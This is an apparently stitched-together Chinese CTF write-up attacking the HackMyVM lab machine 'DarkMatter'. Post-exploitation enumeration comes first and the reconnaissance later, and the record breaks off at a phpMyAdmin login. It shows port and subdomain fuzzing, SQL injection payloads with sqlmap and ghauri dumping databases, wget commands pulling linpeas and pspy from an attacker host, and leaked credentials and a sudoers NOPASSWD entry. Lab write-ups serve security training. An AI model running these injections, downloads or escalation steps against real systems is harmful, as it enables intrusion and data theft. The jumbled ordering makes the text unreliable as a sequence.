Nov 10 2021 usr\ndrwxr-xr-x 12 root root 4096 Nov 13 2021 var\nlrwxrwxrwx 1 root root 27 Nov 10 2021 vmlinuz -> boot\/vmlinuz-5.10.0-9-amd64\nlrwxrwxrwx 1 root root 27 Nov 10 2021 vmlinuz.old -> boot\/vmlinuz-5.10.0-9-amd64\n(remote) www-data@DarkMatter:\/$ sudo -l\n[sudo] password for www-data: \nSorry, try again.\n[sudo] password for www-data: \nsudo: 1 incorrect password attempt\n(remote) www-data@DarkMatter:\/$ find \/ -perm -u=s -type f 2>\/dev\/null\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/usr\/lib\/openssh\/ssh-keysign\n\/usr\/bin\/gpasswd\n\/usr\/bin\/umount\n\/usr\/bin\/newgrp\n\/usr\/bin\/passwd\n\/usr\/bin\/sudo\n\/usr\/bin\/mount\n\/usr\/bin\/su\n\/usr\/bin\/chsh\n\/usr\/bin\/chfn\n(remote) www-data@DarkMatter:\/$ \/usr\/sbin\/getcap -r \/ 2>\/dev\/null\n\/usr\/bin\/ping cap_net_raw=ep\n(remote) www-data@DarkMatter:\/$ cat \/etc\/cron*\ncat: \/etc\/cron.d: Is a directory\ncat: \/etc\/cron.daily: Is a directory\ncat: \/etc\/cron.hourly: Is a directory\ncat: \/etc\/cron.monthly: Is a directory\ncat: \/etc\/cron.weekly: Is a directory\n# \/etc\/crontab: system-wide crontab\n# Unlike any other crontab you don't have to run the `crontab'\n# command to install the new version when you edit this file\n# and files in \/etc\/cron.d. These files also have username fields,\n# that none of the other crontabs do.\n\nSHELL=\/bin\/sh\nPATH=\/usr\/local\/sbin:\/usr\/local\/bin:\/sbin:\/bin:\/usr\/sbin:\/usr\/bin\n\n# Example of job definition:\n# .---------------- minute (0 - 59)\n# | .------------- hour (0 - 23)\n# | | .---------- day of month (1 - 31)\n# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...\n# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat\n# | | | | |\n# * * * * * user-name command to be executed\n17 * * * * root cd \/ && run-parts --report \/etc\/cron.hourly\n25 6 * * * root test -x \/usr\/sbin\/anacron || ( cd \/ && run-parts --report \/etc\/cron.daily )\n47 6 * * 7 root test -x \/usr\/sbin\/anacron || ( cd \/ && run-parts --report \/etc\/cron.weekly )\n52 6 1 * * root test -x \/usr\/sbin\/anacron || ( cd \/ && run-parts --report \/etc\/cron.monthly )<\/code><\/pre>\n\u7136\u540e\u4e0a\u4f20pspy64\u770b\u4e00\u4e0b\uff1a<\/p>\n
(remote) www-data@DarkMatter:\/tmp$ wget http:\/\/172.20.10.8:8888\/lpspy64;chmod +x lpspy64<\/code><\/pre>\n\u5565\u90fd\u6ca1\u53d1\u73b0\uff0c\u5c1d\u8bd5\u67e5\u770b\u4e00\u4e0b\u5176\u4ed6\u4fe1\u606f\uff0c\u4e0a\u4f20linpeas.sh<\/code>\u3002<\/p>\n(remote) www-data@DarkMatter:\/tmp$ wget http:\/\/172.20.10.8:8888\/linpeas.sh;chmod +x linpeas.sh<\/code><\/pre>\n\u53d1\u73b0\u627e\u5230\u4e86\u5947\u602a\u7684\u4e1c\u897f\uff1a<\/p>\n
\u2554\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2563 Checking 'sudo -l', \/etc\/sudoers, and \/etc\/sudoers.d\n\u255a https:\/\/book.hacktricks.xyz\/linux-hardening\/privilege-escalation#sudo-and-suid\nSudoers file: \/etc\/sudoers.d\/darkenergy is readable\ndarkenergy rettaMkraD = (root) NOPASSWD: \/bin\/bash<\/code><\/pre>\n\u8fd9\u73a9\u610f\u53ef\u8bfb\u3002\u3002\u3002\u3002\u3002<\/p>\n
(remote) www-data@DarkMatter:\/etc\/sudoers.d$ cat \/etc\/group | grep darkenergy\ncdrom:x:24:darkenergy\nfloppy:x:25:darkenergy\naudio:x:29:darkenergy\ndip:x:30:darkenergy\nvideo:x:44:darkenergy\nplugdev:x:46:darkenergy\nnetdev:x:109:darkenergy\nbluetooth:x:112:darkenergy\ndarkenergy:x:1000:<\/code><\/pre>\n\u8fd9\u4e2arettaMkraD<\/code>\u611f\u89c9\u662fDarkMatter<\/code>\uff0c\u62bd\u8c61\u3002\u3002\u3002\u3002<\/p>\n(remote) www-data@DarkMatter:\/$ find \/ -group darkenergy 2>\/dev\/null\n\/home\/darkenergy\n\/opt\/note.txt\n\/var\/lib\/sudo\/lectured\/darkenergy\n\n(remote) www-data@DarkMatter:\/$ cat \/opt\/note.txt\nwww-data can read root's important.txt file but idk how ;(<\/code><\/pre>\n\u770b\u4e00\u4e0b\u662f\u5426\u5b58\u5728\u5176\u4ed6\u7279\u6b8a\u6743\u9650\uff0c\u53d1\u73b0\u6ca1\u6709Acls<\/code>\u4ee5\u53cadoas<\/code>\u4e4b\u7c7b\u7684\uff0c\u5c1d\u8bd5\u641e\u5176\u4ed6\u7684\uff1a<\/p>\n(remote) www-data@DarkMatter:\/$ cd \/opt\n(remote) www-data@DarkMatter:\/opt$ ls -la \ntotal 2444\ndrwxr-xr-x 2 root root 4096 Nov 21 2021 .\ndrwxr-xr-x 18 root root 4096 Nov 10 2021 ..\n-rwxrwxr-- 1 darkenergy darkenergy 59 Nov 14 2021 note.txt\n-rwxrwxrwx 1 root root 2489009 Nov 21 2021 website.zip\n(remote) www-data@DarkMatter:\/opt$ cp website.zip \/tmp\/\n(remote) www-data@DarkMatter:\/opt$ cd \/tmp\n(remote) www-data@DarkMatter:\/tmp$ unzip website.zip \n......\n(remote) www-data@DarkMatter:\/tmp$ ls\ndarkmatter linpeas.sh lpspy64 revshell.php website.zip\n(remote) www-data@DarkMatter:\/tmp$ cd darkmatter\/\n(remote) www-data@DarkMatter:\/tmp\/darkmatter$ ls -la\ntotal 92\ndrwxr-x--x 6 www-data www-data 4096 Nov 21 2021 .\ndrwxrwxrwt 3 root root 4096 Aug 7 23:01 ..\n-rwxr-xr-x 1 www-data www-data 6427 Nov 14 2021 blog.php\n-rwxr-xr-x 1 www-data www-data 319 Nov 14 2021 conn.php\ndrwxr-xr-x 2 www-data www-data 4096 Nov 14 2021 css\n-rwxr-xr-x 1 www-data www-data 350 Nov 14 2021 footer.php\n-rwxr-xr-x 1 www-data www-data 272 Nov 14 2021 header.php\n-rwxr-xr-x 1 www-data www-data 2464 Nov 14 2021 home.php\ndrwxr-xr-x 2 www-data www-data 4096 Nov 14 2021 images\n-rwxr-xr-x 1 www-data www-data 476 Nov 14 2021 index.php\ndrwxr-xr-x 2 www-data www-data 4096 Nov 14 2021 js\n-rwxr-xr-x 1 www-data www-data 3416 Nov 21 2021 login.php\n-rwxr-xr-x 1 www-data www-data 108 Nov 14 2021 logout.php\n-rwxr-xr-x 1 www-data www-data 1669 Nov 14 2021 manage.php\n-rwxr-xr-x 1 www-data www-data 3265 Nov 14 2021 navbar.php\n-rwxr-xr-x 1 www-data www-data 2854 Nov 14 2021 profile.php\n-rwxr-x--x 1 www-data www-data 6315 Nov 21 2021 register.php\n-rwxr-xr-x 1 www-data www-data 607 Nov 14 2021 status.php\n-rwxr-xr-x 1 www-data www-data 6172 Nov 14 2021 update.php\ndrwxr-xr-x 2 www-data www-data 4096 Nov 14 2021 upload\n(remote) www-data@DarkMatter:\/tmp\/darkmatter$ cat conn.php\n<?php\n \/\/ connection vars\n $hname = "127.0.0.1";\n $uname = "pam";\n $upass = "th3-!llum!n@t0r";\n $dbname = "mysql";\n\n \/\/ create conn\n $conn = mysqli_connect($hname, $uname, $upass, $dbname);\n\n \/\/ check conn\n if (!$conn) {\n die("Connection failed : " . mysqli_connect_error());\n }\n?>\n\n(remote) www-data@DarkMatter:\/tmp\/darkmatter$ cat profile.php\n.........\n<!--\nDarkMatter's All Power is here ^(#\uff40\u2200 \u00b4)_\u03a8\n<?xml version="1.0" encoding="utf-8"?>\n<KeyFile>\n <Meta>\n <Version>2.0<\/Version>\n <\/Meta>\n <Key>\n <Data Hash="180EC55B">\n AE9AEE5F 228C56A6 42D81928 59EF70B8\n 1A9468F9 C7FA509E 6A290BE5 60111681\n <\/Data>\n <\/Key>\n<\/KeyFile>\n-->\n.........\n\n(remote) www-data@DarkMatter:\/tmp\/darkmatter$ cat register.php\n.........\nif ($_POST['vpassword'] == $password) {\n \/\/ don't forget to "rev" your password after cracking hash\n $vpassword = sha1(md5("s3cr37" . $password . "p4ssw0rd"));\n } \n.........\n(remote) www-data@DarkMatter:\/tmp\/darkmatter$ cd upload\/\n(remote) www-data@DarkMatter:\/tmp\/darkmatter\/upload$ ls -la\ntotal 1376\ndrwxr-xr-x 2 www-data www-data 4096 Nov 14 2021 .\ndrwxr-x--x 6 www-data www-data 4096 Nov 21 2021 ..\n-rwxr-xr-x 1 www-data www-data 50193 Nov 14 2021 dp.jpg\n-rwxr-xr-x 1 www-data www-data 1345261 Nov 14 2021 dp.jpg.bak<\/code><\/pre>\n\u63a2\u7d22<\/h3>\n
\u770b\u4e00\u4e0b\u662f\u5426\u6709\u9690\u85cf\u4fe1\u606f\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DarkMatter]\n\u2514\u2500$ exiftool dp.jpg\nExifTool Version Number : 12.23\nFile Name : dp.jpg\nDirectory : .\nFile Size : 49 KiB\nFile Modification Date\/Time : 2024:08:07 23:17:30-04:00\nFile Access Date\/Time : 2024:08:07 23:18:19-04:00\nFile Inode Change Date\/Time : 2024:08:07 23:17:30-04:00\nFile Permissions : -rw-r--r--\nFile Type : JPEG\nFile Type Extension : jpg\nMIME Type : image\/jpeg\nJFIF Version : 1.01\nResolution Unit : None\nX Resolution : 1\nY Resolution : 1\nProfile CMM Type : Little CMS\nProfile Version : 2.1.0\nProfile Class : Display Device Profile\nColor Space Data : RGB\nProfile Connection Space : XYZ\nProfile Date Time : 2012:01:25 03:41:57\nProfile File Signature : acsp\nPrimary Platform : Apple Computer Inc.\nCMM Flags : Not Embedded, Independent\nDevice Manufacturer : \nDevice Model : \nDevice Attributes : Reflective, Glossy, Positive, Color\nRendering Intent : Perceptual\nConnection Space Illuminant : 0.9642 1 0.82491\nProfile Creator : Little CMS\nProfile ID : 0\nProfile Description : c2\nProfile Copyright : FB\nMedia White Point : 0.9642 1 0.82491\nMedia Black Point : 0.01205 0.0125 0.01031\nRed Matrix Column : 0.43607 0.22249 0.01392\nGreen Matrix Column : 0.38515 0.71687 0.09708\nBlue Matrix Column : 0.14307 0.06061 0.7141\nRed Tone Reproduction Curve : (Binary data 64 bytes, use -b option to extract)\nGreen Tone Reproduction Curve : (Binary data 64 bytes, use -b option to extract)\nBlue Tone Reproduction Curve : (Binary data 64 bytes, use -b option to extract)\nImage Width : 959\nImage Height : 640\nEncoding Process : Baseline DCT, Huffman coding\nBits Per Sample : 8\nColor Components : 3\nY Cb Cr Sub Sampling : YCbCr4:2:0 (2 2)\nImage Size : 959x640\nMegapixels : 0.614\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DarkMatter]\n\u2514\u2500$ binwalk dp.jpg \n\nDECIMAL HEXADECIMAL DESCRIPTION\n--------------------------------------------------------------------------------\n0 0x0 JPEG image data, JFIF standard 1.01\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DarkMatter]\n\u2514\u2500$ binwalk dp.jpg.bak \n\nDECIMAL HEXADECIMAL DESCRIPTION\n--------------------------------------------------------------------------------\n0 0x0 PNG image, 3840 x 2160, 8-bit\/color RGBA, non-interlaced\n159 0x9F Zlib compressed data, best compression<\/code><\/pre>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DarkMatter]\n\u2514\u2500$ rustscan -a $IP -- -sCV \n.----. .-. .-. .----..---. .----. .---. .--. .-. .-.\n| {} }| { } |{ {__ {_ _}{ {__ \/ ___} \/ {} \\ | `| |\n| .-. \\| {_} |.-._} } | | .-._} }\\ }\/ \/\\ \\| |\\ |\n`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'\nThe Modern Day Port Scanner.\n________________________________________\n: https:\/\/discord.gg\/GFrQsGy :\n: https:\/\/github.com\/RustScan\/RustScan :\n --------------------------------------\nNmap? More like slowmap.\ud83d\udc22\n\n[~] The config file is expected to be at "\/home\/kali\/.rustscan.toml"\n[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers\n[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. \nOpen 172.20.10.6:22\nOpen 172.20.10.6:80\n\nPORT STATE SERVICE REASON VERSION\n22\/tcp open ssh syn-ack OpenSSH 8.4p1 Debian 5 (protocol 2.0)\n| ssh-hostkey: \n| 3072 54:42:86:67:e3:5b:74:e1:87:9c:4d:80:0a:59:f3:4d (RSA)\n| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC\/810ntjvY+YKXdq1kS0tvwqkjPh5sOOZykJ9UwHRV6IxhocPDvUEbe5NQrYyuRX619\/5n1+Rd1JTpBU4y5jkmF8ioqWColdaUnXJKeo8zGd8g\/Jmc86hQuqT4\/\/fIc\/bhttQzjAQXGdasZnYK3Ro4tomYPZ1Jer9lge01rivQJIJhyst4iXFlJN7PqkLmuDrSOaM5ul7zQ9ffT2765rLiOKe74bYivwRmT3o+ktdx9OCsKfKQ1lNYdHoF\/+2hqAEvcYhljd+kO7MYRpFZq1S8Vx+GaX4rxsFwknYrSv2BRM7eGTpukW\/6Liy1FQe699mXgpEr4\/mK8VxKpXjgtzMsBWWenFB8EwEgHzWYx6YywiCG6yRr2IQfJ8pptyt8dEe18hjRlklIc6q4QlrLJD6YFPblvmSU4Y6cQVb8fkn8Y3kI4NoPpMrDFVSPT9ruqcdq7qv0CyCJMFqJo0J+cjipsA1FoRmoRiVdRV\/Ere0lMYF0Y6OPmueDJWyzVahuruE=\n| 256 b8:ae:fd:d6:01:e8:e4:0f:63:74:7c:ea:20:ac:fe:80 (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBK\/xU10I7Yc0KCO970yMzJv0Sqyhwlv+J2PL1roiJHyHxq\/DY71BX2m6PMvpiOlynikdFUBL7goPSpqhWTBAb9g=\n| 256 f6:40:de:a2:c3:ec:2f:e0:f0:b9:76:21:3e:ee:a7:5d (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAINH3mv5b7iZ2z8NoJ773\/GrtGBCMgLymD0GbAXI4UWn\/\n80\/tcp open http syn-ack Apache httpd 2.4.51 ((Debian))\n|_http-title: Apache2 Debian Default Page: It works\n|_http-server-header: Apache\/2.4.51 (Debian)\n| http-methods: \n|_ Supported Methods: OPTIONS HEAD GET POST\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n\u76ee\u5f55\u626b\u63cf<\/h3>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DarkMatter]\n\u2514\u2500$ gobuster dir -u http:\/\/$IP -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,txt -b 301,401,403,404 \n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url: http:\/\/172.20.10.6\n[+] Method: GET\n[+] Threads: 10\n[+] Wordlist: \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes: 301,401,403,404\n[+] User Agent: gobuster\/3.6\n[+] Extensions: php,txt\n[+] Timeout: 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/robots.txt (Status: 200) [Size: 14]\nProgress: 39466 \/ 661683 (5.96%)[ERROR] Get "http:\/\/172.20.10.6\/index_4": context deadline exceeded (Client.Timeout exceeded while awaiting headers)\n[ERROR] Get "http:\/\/172.20.10.6\/Install.txt": context deadline exceeded (Client.Timeout exceeded while awaiting headers)\n[ERROR] Get "http:\/\/172.20.10.6\/prodotti.php": context deadline exceeded (Client.Timeout exceeded while awaiting headers)\nProgress: 206416 \/ 661683 (31.20%)[ERROR] Get "http:\/\/172.20.10.6\/navbottom_corner.txt": context deadline exceeded (Client.Timeout exceeded while awaiting headers)\n[ERROR] Get "http:\/\/172.20.10.6\/namevoyager.txt": context deadline exceeded (Client.Timeout exceeded while awaiting headers)\n[ERROR] Get "http:\/\/172.20.10.6\/navbottom_corner": context deadline exceeded (Client.Timeout exceeded while awaiting headers)\nProgress: 238605 \/ 661683 (36.06%)[ERROR] Get "http:\/\/172.20.10.6\/tattoo-removal.txt": context deadline exceeded (Client.Timeout exceeded while awaiting headers)\nProgress: 248356 \/ 661683 (37.53%)^C\n[!] Keyboard interrupt detected, terminating.\nProgress: 248412 \/ 661683 (37.54%)\n===============================================================\nFinished\n===============================================================<\/code><\/pre>\n\u6f0f\u6d1e\u53d1\u73b0<\/h2>\n\u8e29\u70b9<\/h3>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DarkMatter]\n\u2514\u2500$ curl -s http:\/\/$IP | html2text\n\n[Debian Logo] Apache2 Debian Default Page\nIt works!\nThis is the default welcome page used to test the correct operation of the\nApache2 server after installation on Debian systems. If you can read this page,\nit means that the Apache HTTP server installed at this site is working\nproperly. You should replace this file (located at \/var\/www\/html\/index.html)\nbefore continuing to operate your HTTP server.\n........<\/code><\/pre>\n\u654f\u611f\u76ee\u5f55\u63a2\u7d22<\/h3>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DarkMatter]\n\u2514\u2500$ curl -s http:\/\/$IP\/robots.txt \n\/p4ssw0rd.txt\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DarkMatter]\n\u2514\u2500$ curl -s http:\/\/$IP\/p4ssw0rd.txt\nHere is the Password = th3-!llum!n@t0r\n\nDon't forget to add "darkmatter.hmv" in your local Machine<\/code><\/pre>\n\u4fe1\u606f\u641c\u96c6<\/h3>\n
\u6dfb\u52a0dns\u89e3\u6790\uff0c\u91cd\u65b0\u626b\u63cf\u4e00\u4e0b\uff1a<\/p>\n
172.20.10.6 darkmatter.hmv<\/code><\/pre>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DarkMatter]\n\u2514\u2500$ gobuster dir -u http:\/\/darkmatter.hmv -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,txt,html -b 301,401,403,404 \n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url: http:\/\/darkmatter.hmv\n[+] Method: GET\n[+] Threads: 10\n[+] Wordlist: \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes: 301,401,403,404\n[+] User Agent: gobuster\/3.6\n[+] Extensions: php,txt,html\n[+] Timeout: 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/index.html (Status: 200) [Size: 10701]\n\/robots.txt (Status: 200) [Size: 14]\nProgress: 109078 \/ 882244 (12.36%)[ERROR] Get "http:\/\/darkmatter.hmv\/sergey.txt": context deadline exceeded (Client.Timeout exceeded while awaiting headers)\n[ERROR] Get "http:\/\/darkmatter.hmv\/sergey": context deadline exceeded (Client.Timeout exceeded while awaiting headers)\nProgress: 110783 \/ 882244 (12.56%)[ERROR] Get "http:\/\/darkmatter.hmv\/ITN_button.php": context deadline exceeded (Client.Timeout exceeded while awaiting headers)\n[ERROR] Get "http:\/\/darkmatter.hmv\/yahoo-shopping_120x60": context deadline exceeded (Client.Timeout exceeded while awaiting headers)\n[ERROR] Get "http:\/\/darkmatter.hmv\/4986": context deadline exceeded (Client.Timeout exceeded while awaiting headers)\n[ERROR] Get "http:\/\/darkmatter.hmv\/4986.txt": context deadline exceeded (Client.Timeout exceeded while awaiting headers)\n[ERROR] Get "http:\/\/darkmatter.hmv\/4986.html": context deadline exceeded (Client.Timeout exceeded while awaiting headers)\n[ERROR] Get "http:\/\/darkmatter.hmv\/ITN_button": context deadline exceeded (Client.Timeout exceeded while awaiting headers)\nProgress: 143617 \/ 882244 (16.28%)<\/code><\/pre>\n\u61d2\u5f97\u626b\u4e86\uff0c\u7ee7\u7eed\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DarkMatter]\n\u2514\u2500$ curl -s http:\/\/darkmatter.hmv | html2text\n\n[Debian Logo] Apache2 Debian Default Page\nIt works!\nThis is the default welcome page used to test the correct operation of the\nApache2 server after installation on Debian systems. If you can read this page,\nit means that the Apache HTTP server installed at this site is working\nproperly. You should replace this file (located at \/var\/www\/html\/index.html)\nbefore continuing to operate your HTTP server.\nIf you are a normal user of this web site and don't know what this page is\nabout, this probably means that the site is currently unavailable due to\nmaintenance. If the problem persists, please contact the site's administrator.\nConfiguration Overview<\/code><\/pre>\n\u5c1d\u8bd5 fuzz \u4e00\u4e0bdns\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DarkMatter]\n\u2514\u2500$ wfuzz -u http:\/\/darkmatter.hmv -c -w \/usr\/share\/seclists\/Discovery\/DNS\/subdomains-top1million-110000.txt -H "Host: FUZZ.darkmatter.hmv" --hw 933 2>\/dev\/null\n********************************************************\n* Wfuzz 3.1.0 - The Web Fuzzer *\n********************************************************\n\nTarget: http:\/\/darkmatter.hmv\/\nTotal requests: 114441\n\n=====================================================================\nID Response Lines Word Chars Payload \n=====================================================================\n000005051: 200 57 L 128 W 2481 Ch "dark"\n000009532: 400 10 L 35 W 301 Ch "#www"\n000010581: 400 10 L 35 W 301 Ch "#mail"\n000047706: 400 10 L 35 W 301 Ch "#smtp"\n000103135: 400 10 L 35 W 301 Ch "#pop3"\n\nTotal time: 209.3793\nProcessed Requests: 114441\nFiltered Requests: 114436\nRequests\/sec.: 546.5726<\/code><\/pre>\n\u5c1d\u8bd5\u6dfb\u52a0dns\u8fdb\u884c\u8fdb\u4e00\u6b65\u626b\u63cf\uff1a<\/p>\n
172.20.10.6 dark.darkmatter.hmv<\/code><\/pre>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DarkMatter]\n\u2514\u2500$ gobuster dir -u http:\/\/dark.darkmatter.hmv -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,txt -b 301,401,403,404\n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url: http:\/\/dark.darkmatter.hmv\n[+] Method: GET\n[+] Threads: 10\n[+] Wordlist: \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes: 401,403,404,301\n[+] User Agent: gobuster\/3.6\n[+] Extensions: php,txt\n[+] Timeout: 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/index.php (Status: 200) [Size: 2481]\n\/blog.php (Status: 200) [Size: 8433]\n\/home.php (Status: 200) [Size: 4459]\n\/register.php (Status: 200) [Size: 5602]\n\/login.php (Status: 200) [Size: 4117]\n\/header.php (Status: 200) [Size: 272]\n\/profile.php (Status: 302) [Size: 3692] [--> login.php]\n\/footer.php (Status: 200) [Size: 350]\n\/update.php (Status: 302) [Size: 644] [--> login.php]\n\/status.php (Status: 302) [Size: 3225] [--> login.php]\n\/logout.php (Status: 302) [Size: 0] [--> login.php]\n\/navbar.php (Status: 200) [Size: 1766]\n\/manage.php (Status: 302) [Size: 4045] [--> login.php]\nProgress: 19853 \/ 661683 (3.00%)[ERROR] Get "http:\/\/dark.darkmatter.hmv\/stunnel.php": context deadline exceeded (Client.Timeout exceeded while awaiting headers)\n[ERROR] Get "http:\/\/dark.darkmatter.hmv\/current_affairs.txt": context deadline exceeded (Client.Timeout exceeded while awaiting headers)\n[ERROR] Get "http:\/\/dark.darkmatter.hmv\/969.php": context deadline exceeded (Client.Timeout exceeded while awaiting headers)\n[ERROR] Get "http:\/\/dark.darkmatter.hmv\/969.txt": context deadline exceeded (Client.Timeout exceeded while awaiting headers)\n[ERROR] Get "http:\/\/dark.darkmatter.hmv\/current_affairs": context deadline exceeded (Client.Timeout exceeded while awaiting headers)\nProgress: 25750 \/ 661683 (3.89%)\n[!] Keyboard interrupt detected, terminating.\nProgress: 25777 \/ 661683 (3.90%)\n===============================================================\nFinished\n===============================================================<\/code><\/pre>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DarkMatter]\n\u2514\u2500$ whatweb http:\/\/dark.darkmatter.hmv\nhttp:\/\/dark.darkmatter.hmv [200 OK] Apache[2.4.51], Bootstrap, Cookies[PHPSESSID], Country[RESERVED][ZZ], HTML5, HTTPServer[Debian Linux][Apache\/2.4.51 (Debian)], IP[172.20.10.6], JQuery, Script, Title[Demooo]<\/code><\/pre>\n<\/div><\/p>\n\u5c1d\u8bd5\u6ce8\u518c\u4e00\u4e0b\uff1a<\/p>\n
<\/div>
\n<\/div>
\n<\/div><\/p>\n\u4e5f\u4e0d\u884c\uff0c\u5e94\u8be5\u4e0d\u4f1a\u771f\u8981\u627e\u4e2a\u90ae\u7bb1\u641e\u5427\uff0c\u8bd5\u8bd5\u672c\u5730\u90ae\u7bb1\uff1f<\/p>\n
<\/div><\/p>\n\u53d1\u73b0\u6210\u529f\u4e86\uff0c\u5c1d\u8bd5\u767b\u5f55\u3002<\/p>\n
<\/div><\/p>\n\u5728blog\u627e\u5230\u4e86\u4e00\u4e9b\u7528\u6237\u540d\uff0c\u770b\u8d77\u6765\u50cf\u662f\u540d\u4eba\u540d\u8a00\uff0c\u6682\u65f6\u5148\u4e0d\u7528\uff0c\u770b\u4e00\u4e0b\u654f\u611f\u76ee\u5f55\uff1a<\/p>\n
# http:\/\/dark.darkmatter.hmv\/navbar.php\n\u6ca1\u4e1c\u897f<\/code><\/pre>\n<\/div><\/p>\nsql\u6ce8\u5165<\/h3>\n
\u5c1d\u8bd5\u770b\u4e00\u4e0b\u76f8\u5173\u4fe1\u606f\uff0c\u70b9\u4e00\u4e0bupdate\uff1a<\/p>\n
http:\/\/dark.darkmatter.hmv\/update.php?id=5<\/code><\/pre>\n\u5c1d\u8bd5\u8fdb\u884c\u6ce8\u5165\uff08\u624b\u52a8\u8bd5\u4e86\u51e0\u4e0b\u6ca1\u51fa\u6765\uff09\uff0c\u8fd9\u4e2a\u5de5\u5177\u548csqlmap\u4e00\u6837\uff0c\u53ea\u662f\u56e0\u4e3a\u5dee\u751f\u6587\u5177\u591a\uff0c\u54c8\u54c8\u54c8\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DarkMatter]\n\u2514\u2500$ ghauri -u "http:\/\/dark.darkmatter.hmv\/update.php?id=5" --cookie "PHPSESSID=c5nvi9jb2jfjfsf1lq403snpns" --batch \n---\nParameter: id (GET)\n Type: boolean-based blind\n Title: AND boolean-based blind - WHERE or HAVING clause\n Payload: id=5' AND 02477=2477-- wXyW\n\n Type: time-based blind\n Title: MySQL >= 5.0.12 time-based blind (IF - comment)\n Payload: id=5'XOR(if(now()=sysdate(),SLEEP(8),0))XOR'Z\n---\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DarkMatter]\n\u2514\u2500$ sqlmap -u "http:\/\/dark.darkmatter.hmv\/update.php?id=5" --cookie "PHPSESSID=c5nvi9jb2jfjfsf1lq403snpns" --batch\n---\nParameter: id (GET)\n Type: boolean-based blind\n Title: AND boolean-based blind - WHERE or HAVING clause\n Payload: id=5' AND 5111=5111 AND 'BHBW'='BHBW\n\n Type: time-based blind\n Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)\n Payload: id=5' AND (SELECT 6907 FROM (SELECT(SLEEP(5)))SUJr) AND 'Wzgo'='Wzgo\n\n Type: UNION query\n Title: Generic UNION query (NULL) - 6 columns\n Payload: id=5' UNION ALL SELECT NULL,CONCAT(0x7178707071,0x485a426d6f59676875437859506c52746a736642624a6d7069504a676f466a4f4a504d4a4c684c74,0x7178767a71),NULL,NULL,NULL,NULL-- -\n---\n\n# sqlmap -u "http:\/\/dark.darkmatter.hmv\/update.php?id=5" --cookie "PHPSESSID=c5nvi9jb2jfjfsf1lq403snpns" --batch --dbs\navailable databases [4]:\n[*] information_schema\n[*] mysql\n[*] performance_schema\n[*] phpmyadmin\n\n# sqlmap -u "http:\/\/dark.darkmatter.hmv\/update.php?id=5" --cookie "PHPSESSID=c5nvi9jb2jfjfsf1lq403snpns" --batch -D phpmyadmin --tables\n+------------------------+\n| pma__bookmark |\n| pma__central_columns |\n| pma__column_info |\n| pma__designer_settings |\n| pma__export_templates |\n| pma__favorite |\n| pma__history |\n| pma__navigationhiding |\n| pma__pdf_pages |\n| pma__recent |\n| pma__relation |\n| pma__savedsearches |\n| pma__table_coords |\n| pma__table_info |\n| pma__table_uiprefs |\n| pma__tracking |\n| pma__userconfig |\n| pma__usergroups |\n| pma__users |\n+------------------------+\n\n# sqlmap -u "http:\/\/dark.darkmatter.hmv\/update.php?id=5" --cookie "PHPSESSID=c5nvi9jb2jfjfsf1lq403snpns" --batch -D phpmyadmin -T pma__userconfig --dump\n+----------+---------------------+-------------------------------+\n| username | timevalue | config_data |\n+----------+---------------------+-------------------------------+\n| pam | 2021-11-14 05:58:36 | {"Console\\\\\/Mode":"collapse"} |\n+----------+---------------------+-------------------------------+<\/code><\/pre>\n\u53d1\u73b0\u5b58\u5728 phpmyadmin\uff0c\u627e\u5230\u4e00\u4e2a\u7528\u6237\u540d\uff0c\u5c1d\u8bd5\u767b\u5f55\uff1a<\/p>\n
